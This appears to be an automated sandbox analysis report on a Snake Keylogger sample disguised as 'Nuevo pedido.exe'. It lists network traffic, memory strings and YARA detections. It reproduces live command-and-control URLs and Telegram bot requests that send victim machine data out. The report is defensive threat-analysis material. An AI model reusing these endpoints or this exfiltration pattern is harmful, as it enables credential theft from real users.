Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:22:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2009/01/2025%20/%2020:42:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:36:13 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 09 Jan 2025 15:36:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Nuevo pedido.exe, 00000000.00000002.1730142640.00000000028F9000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1776750263.0000000003119000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003101000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Nuevo pedido.exe, 00000000.00000002.1736143627.00000000058E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Nuevo pedido.exe, 00000000.00000002.1736270644.0000000005920000.00000004.00000020.00020000.00000000.sdmp, Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Nuevo pedido.exe, 00000000.00000002.1736334357.00000000069F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003151000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003291000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003301000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.0000000003327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E2000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000422F000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004386000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000043D3000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004257000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004513000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004321000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044C5000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.000000000436E000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004361000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.000000000438C000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.0000000004232000.00000004.00000800.00020000.00000000.sdmp, Nuevo pedido.exe, 00000009.00000002.4148285320.00000000041BD000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000045C3000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000042FC000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.00000000044CB000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004327000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4146264868.0000000004371000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, QGVhHsAOjb.exe, 0000000E.00000002.4139020544.000000000334B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49775 version: TLS 1.2

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
